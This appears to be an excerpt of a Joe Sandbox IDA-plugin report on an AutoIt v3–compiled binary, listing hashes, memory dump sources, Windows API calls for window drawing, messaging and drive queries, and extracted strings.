                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: ad94b758054ce6f4be5f46d41e371b2680496015516d9e9a49d4488d4fd3b6ec
                                                    • Instruction ID: 518e63d414dcb6f73a6d37bc3bdae04cda89082987236895af16791eda4d63d2
                                                    • Opcode Fuzzy Hash: ad94b758054ce6f4be5f46d41e371b2680496015516d9e9a49d4488d4fd3b6ec
                                                    • Instruction Fuzzy Hash: CBC04CF1800109DBDB05DBA0D988FEF77BCBB04304F104055A105B2100D7789B448E71
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0079A35A
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 582b41471048701c91109fd0526ccdbc9cf9f622b414d2afcd9faac81fea7543
                                                    • Instruction ID: 8c64508e539461ca078b036aa156b3e165d08f72d28ab8d1efb7e09472980c35
                                                    • Opcode Fuzzy Hash: 582b41471048701c91109fd0526ccdbc9cf9f622b414d2afcd9faac81fea7543
                                                    • Instruction Fuzzy Hash: BAA0113002020CABCA022B82EC08888BFACEA002A0B008020F80C002228B32A8208A80
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 007E7F45
                                                    • DeleteObject.GDI32(00000000), ref: 007E7F57
                                                    • DestroyWindow.USER32 ref: 007E7F65
                                                    • GetDesktopWindow.USER32 ref: 007E7F7F
                                                    • GetWindowRect.USER32(00000000), ref: 007E7F86
                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007E80C7
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007E80D7
                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E811F
                                                    • GetClientRect.USER32(00000000,?), ref: 007E812B
                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007E8165
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E8187
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E819A
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E81A5
                                                    • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E81AE
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E81BD
                                                    • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E81C6
                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E81CD
                                                    • GlobalFree.KERNEL32(00000000), ref: 007E81D8
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E81EA
                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00803C7C,00000000), ref: 007E8200
                                                    • GlobalFree.KERNEL32(00000000), ref: 007E8210
                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007E8236
                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007E8255
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E8277
                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E8464
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                    • API String ID: 2211948467-2373415609
                                                    • Opcode ID: 8b7ba7c2f8992f3e75ab73da82cefdc3473af0e60a1ea9a03b40a136ef751986
                                                    • Instruction ID: ca345a69639892240665088042a55e0c1ca1e917564545bb16f00d4ebd8755d6
                                                    • Opcode Fuzzy Hash: 8b7ba7c2f8992f3e75ab73da82cefdc3473af0e60a1ea9a03b40a136ef751986
                                                    • Instruction Fuzzy Hash: 56027C71900209EFDB54DF65CC89EAE7BB9FB49310F048158F919AB2A1DB75AD01CF60
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,00800980), ref: 007F3C65
                                                    • IsWindowVisible.USER32(?), ref: 007F3C89
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpperVisibleWindow
                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 4105515805-45149045
                                                    • Opcode ID: 16430bc55123bd6e982645dc52cdbc1ace80f9d02d97383e05f0ef1a22504fa8
                                                    • Instruction ID: 1532c7b52bb221a6c42781a918de342d59111ee2d28033508f797a7e8afdacf3
                                                    • Opcode Fuzzy Hash: 16430bc55123bd6e982645dc52cdbc1ace80f9d02d97383e05f0ef1a22504fa8
                                                    • Instruction Fuzzy Hash: 8DD17D30204218DFCB14EF60D459A7EB7A1EF94344F10845CFA965B3A2CB39ED8ACB91
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 007FAC55
                                                    • GetSysColorBrush.USER32(0000000F), ref: 007FAC86
                                                    • GetSysColor.USER32(0000000F), ref: 007FAC92
                                                    • SetBkColor.GDI32(?,000000FF), ref: 007FACAC
                                                    • SelectObject.GDI32(?,?), ref: 007FACBB
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 007FACE6
                                                    • GetSysColor.USER32(00000010), ref: 007FACEE
                                                    • CreateSolidBrush.GDI32(00000000), ref: 007FACF5
                                                    • FrameRect.USER32(?,?,00000000), ref: 007FAD04
                                                    • DeleteObject.GDI32(00000000), ref: 007FAD0B
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 007FAD56
                                                    • FillRect.USER32(?,?,?), ref: 007FAD88
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 007FADB3
                                                      • Part of subcall function 007FAF18: GetSysColor.USER32(00000012), ref: 007FAF51
                                                      • Part of subcall function 007FAF18: SetTextColor.GDI32(?,?), ref: 007FAF55
                                                      • Part of subcall function 007FAF18: GetSysColorBrush.USER32(0000000F), ref: 007FAF6B
                                                      • Part of subcall function 007FAF18: GetSysColor.USER32(0000000F), ref: 007FAF76
                                                      • Part of subcall function 007FAF18: GetSysColor.USER32(00000011), ref: 007FAF93
                                                      • Part of subcall function 007FAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007FAFA1
                                                      • Part of subcall function 007FAF18: SelectObject.GDI32(?,00000000), ref: 007FAFB2
                                                      • Part of subcall function 007FAF18: SetBkColor.GDI32(?,00000000), ref: 007FAFBB
                                                      • Part of subcall function 007FAF18: SelectObject.GDI32(?,?), ref: 007FAFC8
                                                      • Part of subcall function 007FAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 007FAFE7
                                                      • Part of subcall function 007FAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007FAFFE
                                                      • Part of subcall function 007FAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 007FB013
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                    • String ID:
                                                    • API String ID: 4124339563-0
                                                    • Opcode ID: bb656e8798032bffeebee81e77be0fc86e144637df0a54c60bdac2021834d394
                                                    • Instruction ID: 3afa7246bf0925d89c1d4f4405aaacd94b5464896a880cd05eb47fdad10e3d75
                                                    • Opcode Fuzzy Hash: bb656e8798032bffeebee81e77be0fc86e144637df0a54c60bdac2021834d394
                                                    • Instruction Fuzzy Hash: B7A19CB2108305BFD7519F64DC08F6B7BA9FF89321F104A19FA66A62A0DB35D840CF52
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?), ref: 00773072
                                                    • DeleteObject.GDI32(00000000), ref: 007730B8
                                                    • DeleteObject.GDI32(00000000), ref: 007730C3
                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 007730CE
                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 007730D9
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 007AC77C
                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007AC7B5
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007ACBDE
                                                      • Part of subcall function 00771F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00772412,?,00000000,?,?,?,?,00771AA7,00000000,?), ref: 00771F76
                                                    • SendMessageW.USER32(?,00001053), ref: 007ACC1B
                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007ACC32
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007ACC48
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007ACC53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                    • String ID: 0
                                                    • API String ID: 464785882-4108050209
                                                    • Opcode ID: e9fc2afe383de359004fa94b203dcc368dfaa3442aeaeb0b28a0092753cd29ac
                                                    • Instruction ID: 01b7eca69ebe358a92e30a1d1e9670ec3d3142089a264d3e7a43c3b75dbdbbec
                                                    • Opcode Fuzzy Hash: e9fc2afe383de359004fa94b203dcc368dfaa3442aeaeb0b28a0092753cd29ac
                                                    • Instruction Fuzzy Hash: EF12BE30604201EFDB26CF24C888BA9B7E5BF85351F148669F599CB262C739EC41DF91
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 2660009612-1645009161
                                                    • Opcode ID: 9142422d42d5ad10ca4996a68cdea6b09f81bc86527e57b33e353f7f9aa82a02
                                                    • Instruction ID: 46902a686d92d510bd23c217a7e3a9aaacc05262f513c6a7f65adad707297684
                                                    • Opcode Fuzzy Hash: 9142422d42d5ad10ca4996a68cdea6b09f81bc86527e57b33e353f7f9aa82a02
                                                    • Instruction Fuzzy Hash: 9FA18130A40209EBCF14BF61DC5AFAE7BA9BF44740F140029F815AB293DB79AE52D750
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 007E7BC8
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007E7C87
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007E7CC5
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007E7CD7
                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007E7D1D
                                                    • GetClientRect.USER32(00000000,?), ref: 007E7D29
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007E7D6D
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007E7D7C
                                                    • GetStockObject.GDI32(00000011), ref: 007E7D8C
                                                    • SelectObject.GDI32(00000000,00000000), ref: 007E7D90
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007E7DA0
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007E7DA9
                                                    • DeleteDC.GDI32(00000000), ref: 007E7DB2
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007E7DDE
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 007E7DF5
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007E7E30
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007E7E44
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 007E7E55
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007E7E85
                                                    • GetStockObject.GDI32(00000011), ref: 007E7E90
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007E7E9B
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007E7EA5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: e3c37fdf0b7558765da507bd8fbfcc6b98dc48e9b08bd3660c31f711957e570e
                                                    • Instruction ID: 3a27dc35a54d5857f23e8ed853d287538a8ffecad4e79cde47925006b2cf279a
                                                    • Opcode Fuzzy Hash: e3c37fdf0b7558765da507bd8fbfcc6b98dc48e9b08bd3660c31f711957e570e
                                                    • Instruction Fuzzy Hash: 61A160B1A40619BFEB14DB64DC4AFAB7BA9FB49710F108114FA15A72E0D774AD01CF60
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 007DB361
                                                    • GetDriveTypeW.KERNEL32(?,00802C4C,?,\\.\,00800980), ref: 007DB43E
                                                    • SetErrorMode.KERNEL32(00000000,00802C4C,?,\\.\,00800980), ref: 007DB59C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: 29fd4358f09b3cc4327ac38874297f03396e445e5df2a3ae9a655ab4a845e485
                                                    • Instruction ID: 9d3311a6e13bc5688d634cfa4ece6a80152fb1ea55635362f525f53d9d9bbd5f
                                                    • Opcode Fuzzy Hash: 29fd4358f09b3cc4327ac38874297f03396e445e5df2a3ae9a655ab4a845e485
                                                    • Instruction Fuzzy Hash: 2E519E30B41209EBCB00EB20E946A7C77B0FB44740B29812BE457E7391DB7DAE91DB51
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 007FA0F7
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007FA1B0
                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 007FA1CC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: 0
                                                    • API String ID: 2326795674-4108050209
                                                    • Opcode ID: ee10aa6eff08bc650dccec53541340480ec0ae065ea03ab690bfc14f3bd9c219
                                                    • Instruction ID: 74d32c4cb40b7e08b6db649f2ab123151ece79ebf392fbf15db768c01846b4f8
                                                    • Opcode Fuzzy Hash: ee10aa6eff08bc650dccec53541340480ec0ae065ea03ab690bfc14f3bd9c219
                                                    • Instruction Fuzzy Hash: E202DDB0208309BFDB258F18C848BBABBE5FF85314F048519FA99963A1C779D854CF52
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 007FAF51
                                                    • SetTextColor.GDI32(?,?), ref: 007FAF55
                                                    • GetSysColorBrush.USER32(0000000F), ref: 007FAF6B
                                                    • GetSysColor.USER32(0000000F), ref: 007FAF76
                                                    • CreateSolidBrush.GDI32(?), ref: 007FAF7B
                                                    • GetSysColor.USER32(00000011), ref: 007FAF93
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007FAFA1
                                                    • SelectObject.GDI32(?,00000000), ref: 007FAFB2
                                                    • SetBkColor.GDI32(?,00000000), ref: 007FAFBB
                                                    • SelectObject.GDI32(?,?), ref: 007FAFC8
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 007FAFE7
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007FAFFE
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 007FB013
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007FB05F
                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007FB086
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 007FB0A4
                                                    • DrawFocusRect.USER32(?,?), ref: 007FB0AF
                                                    • GetSysColor.USER32(00000011), ref: 007FB0BD
                                                    • SetTextColor.GDI32(?,00000000), ref: 007FB0C5
                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007FB0D9
                                                    • SelectObject.GDI32(?,007FAC1F), ref: 007FB0F0
                                                    • DeleteObject.GDI32(?), ref: 007FB0FB
                                                    • SelectObject.GDI32(?,?), ref: 007FB101
                                                    • DeleteObject.GDI32(?), ref: 007FB106
                                                    • SetTextColor.GDI32(?,?), ref: 007FB10C
                                                    • SetBkColor.GDI32(?,?), ref: 007FB116
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1996641542-0
                                                    • Opcode ID: 12fda1053f0d0d987ebe776972bc9960646b34f545810087540573401aa5cfee
                                                    • Instruction ID: 068eceda4e139ba0be278ec22319813f044f32e7f50658ccf04db38146e02f37
                                                    • Opcode Fuzzy Hash: 12fda1053f0d0d987ebe776972bc9960646b34f545810087540573401aa5cfee
                                                    • Instruction Fuzzy Hash: 286119B2900218BFDF519FA4DC49BAE7BB9FF08320F118115FA25AB2A1D7759940DF90
                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007F90EA
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F90FB
                                                    • CharNextW.USER32(0000014E), ref: 007F912A
                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007F916B
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007F9181
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F9192
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007F91AF
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 007F91FB
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007F9211
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 007F9242
                                                    • _memset.LIBCMT ref: 007F9267
                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007F92B0
                                                    • _memset.LIBCMT ref: 007F930F
                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007F9339
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 007F9391
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 007F943E
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007F9460
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F94AA
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F94D7
                                                    • DrawMenuBar.USER32(?), ref: 007F94E6
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 007F950E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                    • String ID: 0
                                                    • API String ID: 1073566785-4108050209
                                                    • Opcode ID: a98fdab24d079de4a4fd746f4ab53c86f9b1d272a1433699eba50551181caa67
                                                    • Instruction ID: b9de3bba4fa48923ac7dc955c68711a4440d92c5b453433cb0f9e3d098c11be9
                                                    • Opcode Fuzzy Hash: a98fdab24d079de4a4fd746f4ab53c86f9b1d272a1433699eba50551181caa67
                                                    • Instruction Fuzzy Hash: BCE15A7090020DAADB219F54CC88FFE7BB9FF05710F108156FB25AA291DB798A91DF61
                                                    APIs
